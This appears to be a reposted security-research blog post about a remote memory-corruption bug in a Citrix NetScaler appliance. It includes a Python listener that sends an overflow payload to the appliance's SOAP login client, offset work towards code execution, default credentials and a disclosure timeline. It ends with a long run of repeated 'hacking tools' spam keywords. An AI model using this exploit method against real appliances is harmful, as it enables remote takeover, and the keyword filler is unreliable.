Scaling The NetScaler

Posted by Informasi Pekerjaan Saturday, August 29, 2020 0 comments

A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and take a peek. First I started out by downloading the trial Netscaler VM (version 10.1-119.7) from the following location:

http://www.citrix.com/products/netscaler-application-delivery-controller/try.html

Upon boot, the appliance is configured with nsroot/nsroot for the login and password. I logged in and started looking around and noticed that the web application is written in PHP using the code igniter framework (screw that crap). Since code igniter abstracts everything with MVC and actual scripts are hidden behind routes I decided to take a look at the apache configuration. I noticed that apache was configured with a SOAP endpoint that was using shared objects (YUMMY):

/etc/httpd 
# SOAP handler
<Location /soap>
SetHandler gsoap-handler SOAPLibrary /usr/lib/libnscli90.so SupportLibrary /usr/lib/libnsapps.so </Location>
It wasn't clear what this end point was used for and it wasn't friendly if you hit it directly:




So I grep'd through the application code looking for any calls to this service and got a hit:
root@ns# grep -r '/soap' *
models/common/xmlapi_model.php: $this->soap_client = new nusoap_client("http://" . $this->server_ip . "/soap");

Within this file I saw this juicy bit of PHP which would have made this whole process way easier if it wasn't neutered with the hardcoded "$use_api = true;"


/netscaler/ns_gui/admin_ui/php/application/models/common/xmlapi_model.php
protected function command_execution($command, $parameters, $use_api = true) {
//Reporting can use API & exe to execute commands. To make it work, comment the following line.
$use_api = true; if(!$use_api)
{
$exec_command = "/netscaler/nscollect " . $this- >convert_parameters_to_string($command, $parameters);
$this->benchmark->mark("ns_exe_start");
$exe_result = exec($exec_command); $this->benchmark->mark("ns_exe_end");
$elapsed_time = $this->benchmark->elapsed_time("ns_exe_start",
"ns_exe_end");
log_message("profile", $elapsed_time . " --> EXE_EXECUTION_TIME " .
$command); $this->result["rc"] = 0;
$this->result["message"] = "Done"; $this->result["List"] = array(array("response" => $exe_result));
$return_value = 0;
For giggles I set it to false and gave it a whirl, worked as expected :(

The other side of this "if" statement was a reference to making a soap call and due to the reference to the local "/soap" and the fact all roads from "do_login" were driven to this file through over nine thousand levels of abstraction it was clear that upon login the server made an internal request to this endpoint. I started up tcpdump on the loopback interface on the box and captured an example request:
root@ns# tcpdump -Ani lo0 -s0 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo0, link-type NULL (BSD loopback), capture size 65535 bytes 23:29:18.169188 IP 127.0.0.1.49731 > 127.0.0.1.80: P 1:863(862) ack 1 win 33304 <nop,nop,timestamp 1659543 1659542>
E...>D@.@............C.P'R...2.............
..R...R.POST /soap HTTP/1.0
Host: 127.0.0.1
User-Agent: NuSOAP/0.9.5 (1.56)
Content-Type: text/xml; charset=ISO-8859-1
SOAPAction: ""
Content-Length: 708
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body> <ns7744:login xmlns:ns7744="urn:NSConfig"><username xsi:type="xsd:string">nsroot</username><password xsi:type="xsd:string">nsroot</password><clientip
xsi:type="xsd:string">192.168.166.1</clientip><cookieTimeout xsi:type="xsd:int">1800</cookieTimeout><ns xsi:type="xsd:string">192.168.166.138</ns></ns7744:login></SOAP-ENV:Body> </SOAP-ENV:Envelope>
23:29:18.174582 IP 127.0.0.1.80 > 127.0.0.1.49731: P 1:961(960) ack 863 win 33304 <nop,nop,timestamp 1659548 1659543>
E...>[@.@............P.C.2..'R.o.....\.....
..R...R.HTTP/1.1 200 OK
Date: Mon, 02 Jun 2014 23:29:18 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2014 23:29:18 GMT Status: 200 OK
Content-Length: 615
Connection: keep-alive, close
Set-Cookie: NSAPI=##7BD2646BC9BC8A2426ACD0A5D92AF3377A152EBFDA878F45DAAF34A43 09F;Domain=127.0.0.1;Path=/soap;Version=1
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns="urn:NSConfig"> <SOAP-ENV:Header></SOAP-ENV:Header><SOAP-ENV:Body SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:loginResponse><return xsi:type="ns:simpleResult"><rc xsi:type="xsd:unsignedInt">0</rc><message xsi:type="xsd:string">Done</message> </return></ns:loginResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>
I pulled the request out and started playing with it in burp repeater. The one thing that seemed strange was that it had a parameter that was the IP of the box itself, the client string I got...it was used for tracking who was making requests to login, but the other didn't really make sense to me. I went ahead and changed the address to another VM and noticed something strange:





According to tcpdump it was trying to connect to my provided host on port 3010:
root@ns# tcpdump -A host 192.168.166.137 and port not ssh
tcpdump: WARNING: BIOCPROMISC: Device busy
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on 0/1, link-type EN10MB (Ethernet), capture size 96 bytes 23:37:17.040559 IP 192.168.166.138.49392 > 192.168.166.137.3010: S 4126875155:4126875155(0) win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 2138392 0,sackOK,eol>

I fired up netcat to see what it was sending, but it was just "junk", so I grabbed a pcap on the loopback interface on the netscaler vm to catch a normal transaction between the SOAP endpoint and the service to see what it was doing. It still wasn't really clear exactly what the data was as it was some sort of "binary" stream:




I grabbed a copy of the servers response and setup a test python client that replied with a replay of the servers response, it worked (and there may be an auth bypass here as it responds with a cookie for some API functionality...). I figured it may be worth shooting a bunch of crap back at the client just to see what would happen. I modified my python script to insert a bunch "A" into the stream:
import socket,sys
resp = "\x00\x01\x00\x00\xa5\xa5"+ ("A"*1000)+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
HOST = None # Symbolic name meaning all available interfaces
PORT = 3010 # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.bind(sa)
s.listen(1)
except socket.error as msg:
s.close()
s = None
continue
break
if s is None:
print 'could not open socket'
sys.exit(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
data = conn.recv(1024)
if not data:
break
print 'sending!' conn.send(resp)
print 'sent!' conn.close()


Which provided the following awesome log entry in the Netscaler VM window:



Loading the dump up in gdb we get the following (promising looking):


And the current instruction it is trying to call:



An offset into the address 0x41414141, sure that usually works :P - we need to adjust the payload in a way that EDX is a valid address we can address by offset in order to continue execution. In order to do that we need to figure out where in our payload the EDX value is coming from. The metasploit "pattern_create" works great for this ("root@blah:/usr/share/metasploit-framework/tools# ./pattern_create.rb 1000"). After replacing the "A" *1000 in our script with the pattern we can see that EDX is at offset 610 in our payload:





Looking at the source of EDX, which is an offset of EBP we can see the rest of our payload, we can go ahead and replace the value in our payload at offset 610 with the address of EBP 
resp = "\x00\x01\x00\x00\xa5\xa5"+p[:610]+'\x78\xda\xff\xff'+p[614:]+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

When we run everything again and take a look at our core dump you can see we have progressed in execution and have hit another snag that causes a crash:


The crash was caused because once again the app is trying to access a value at an offset of a bad address (from our payload). This value is at offset 606 in our payload according to "pattern_offset" and if you were following along you can see that this value sits at 0xffffda78 + 4, which is what we specified previously. So we need to adjust our payload with another address to have EDX point at a valid address and keep playing whack a mole OR we can look at the function and possibly find a short cut:




If we can follow this code path keeping EDX a valid memory address and set EBP+12 (offset in our payload) to 0x0 we can take the jump LEAV/RET and for the sake of time and my sanity, unroll the call stack to the point of our control. You will have to trust me here OR download the VM and see for yourself (my suggestion if you have found this interesting :> )

And of course, the money shot:


A PoC can be found HERE that will spawn a shell on port 1337 of the NetScaler vm, hopefully someone has some fun with it :)

It is not clear if this issue has been fixed by Citrix as they stopped giving me updates on the status of this bug. For those that are concerned with the timeline:

6/3/14 - Bug was reported to Citrix
6/4/14 - Confirmation report was received
6/24/14 - Update from Citrix - In the process of scheduling updates
7/14/14 - Emailed asking for update
7/16/14 - Update from Citrix - Still scheduling update, will let me know the following week.
9/22/14 - No further communication received. Well past 100 days, public disclosure


More information
  1. New Hack Tools
  2. Hacker Tools Mac
  3. Pentest Tools Windows
  4. Hack Tools
  5. Hackrf Tools
  6. Nsa Hack Tools Download
  7. Hacking Tools Mac
  8. Hacking Tools Free Download
  9. Hacker Tools Free
  10. Hacking Tools For Beginners
  11. Hack Tool Apk
  12. Pentest Tools Alternative
  13. Hacker Tools Github
  14. Hacker Tools Free
  15. Wifi Hacker Tools For Windows
  16. Tools 4 Hack
  17. Hacking Tools Hardware
  18. Hacking Apps
  19. Hacker Tools Free
  20. Hack Tools
  21. Hacker Tools For Mac
  22. Hacker Tools
  23. Hacking Tools Free Download
  24. Pentest Tools Apk
  25. Hacker Tools Hardware
  26. Hacking Tools Windows 10
  27. Hacking Tools 2019
  28. Hacking Tools Name
  29. Pentest Tools Alternative
  30. Pentest Tools Kali Linux
  31. Hacking Tools For Windows
  32. Install Pentest Tools Ubuntu
  33. Hacker Tools Mac
  34. Tools 4 Hack
  35. Hacking Tools Online
  36. Pentest Tools Website Vulnerability
  37. Hacking Tools For Kali Linux
  38. How To Make Hacking Tools
  39. Hacker Security Tools
  40. Hacking Tools 2019
  41. Hacking Tools For Windows Free Download
  42. Hack Apps
  43. Hacking Tools Kit
  44. Hacking Tools Usb
  45. Pentest Tools Tcp Port Scanner
  46. Install Pentest Tools Ubuntu
  47. Hack Tools Pc
  48. Pentest Tools Find Subdomains
  49. Hack Tools 2019
  50. Hacking Apps
  51. Hacker Tools
  52. Hacking Tools For Windows Free Download
  53. Pentest Tools
  54. Hacker Tools 2019
  55. Hack Tools For Windows
  56. Hacker Tools
  57. Hack Tools For Games
  58. Hacking Tools Download
  59. Pentest Tools For Android
  60. Hacker Tools Apk
  61. Hacking Tools Github
  62. Pentest Tools Website
  63. What Are Hacking Tools
  64. Free Pentest Tools For Windows
  65. Pentest Tools Github
  66. Hack Tools 2019
  67. Hacking Tools Github
  68. Pentest Tools Alternative
  69. Hacking Tools Pc
  70. Hacker Tools Github
  71. Pentest Tools
  72. Hacker Tools For Pc
  73. Game Hacking
  74. Hacker Search Tools
  75. Hacking Tools 2020
  76. Pentest Tools Tcp Port Scanner
  77. Hackers Toolbox
  78. Hack Tools For Mac
  79. Hacker Tools Free Download
  80. Pentest Tools Port Scanner
  81. Pentest Recon Tools
  82. Hack Tools For Ubuntu
  83. Pentest Recon Tools
  84. Hacker
  85. Pentest Tools Find Subdomains
  86. Pentest Tools Website
  87. Pentest Tools Port Scanner
  88. Underground Hacker Sites
  89. Physical Pentest Tools
  90. Tools 4 Hack
  91. Hacker Tools List
  92. Pentest Tools Apk
  93. Hacking Apps
  94. Hacking Tools For Games
  95. Hack Tools For Pc
  96. Hacking Tools For Pc
  97. Pentest Tools Nmap
  98. Hack Tools For Ubuntu
  99. Hack Tools Github
  100. Hacking Tools Download
  101. Hacker Security Tools
  102. Hacker Tools Github
  103. Top Pentest Tools
  104. Hacker Tools Hardware
  105. Hacker Tools Linux
  106. Ethical Hacker Tools
  107. Kik Hack Tools
  108. Game Hacking
  109. Pentest Tools Tcp Port Scanner
  110. Install Pentest Tools Ubuntu
  111. Hacking Tools Github
  112. Nsa Hack Tools Download
  113. Hacker Tools For Windows
  114. Pentest Tools Tcp Port Scanner
  115. Hack App
  116. Pentest Tools Download
  117. Bluetooth Hacking Tools Kali
  118. Computer Hacker
  119. Hacking Tools Usb
  120. Hacking Tools For Beginners
  121. Game Hacking
  122. Hacking Tools For Windows 7
  123. Pentest Tools For Mac
  124. Pentest Tools Subdomain
  125. Hacker Tools 2019
  126. Tools For Hacker
  127. Pentest Tools Github
  128. Pentest Tools Find Subdomains
  129. Hacker Tools For Ios
  130. Hacking Tools Usb
  131. Hack Tool Apk No Root
  132. Install Pentest Tools Ubuntu
  133. New Hacker Tools
  134. Pentest Tools Github
  135. Best Hacking Tools 2020
  136. Pentest Tools Tcp Port Scanner
  137. Install Pentest Tools Ubuntu
  138. Hacking Tools For Mac
  139. Hak5 Tools
  140. Hacks And Tools
  141. Pentest Tools Review
  142. Hack Tool Apk No Root
  143. Pentest Tools Alternative
  144. Hacker
  145. Pentest Tools For Ubuntu
  146. Usb Pentest Tools
  147. Wifi Hacker Tools For Windows
  148. New Hack Tools
  149. Hacking Tools Pc
  150. Pentest Tools Port Scanner
  151. Hacking Tools For Games
  152. Hack Tools For Ubuntu
  153. Pentest Tools Online
  154. Hacking Tools And Software
  155. Hack Tool Apk No Root
  156. Hacker Tools For Pc
  157. Hacking Tools Name
  158. Pentest Tools Windows
  159. Hacker Tools Mac
  160. Pentest Tools Port Scanner
  161. Hak5 Tools
  162. Hack Rom Tools
  163. Hack Tools
  164. Wifi Hacker Tools For Windows
  165. Android Hack Tools Github
  166. How To Make Hacking Tools
  167. Hack Tools For Mac
  168. Ethical Hacker Tools
  169. Hacker Tools Mac
  170. Growth Hacker Tools
  171. Pentest Tools Windows
  172. Hack Tool Apk
  173. Hacking Tools Pc


Anda sedang membaca artikel tentang Scaling The NetScaler dan anda bisa menemukan artikel Scaling The NetScaler ini dengan url https://hobi-kesenangan.blogspot.com/2020/08/scaling-netscaler.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Scaling The NetScaler ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Scaling The NetScaler sebagai sumbernya.

Silahkan sobat tinggalkan komentar jika dirasa ada informasi yang sobat butuhkan

0 comments:

Post a Comment

vivanews.com

nines cantik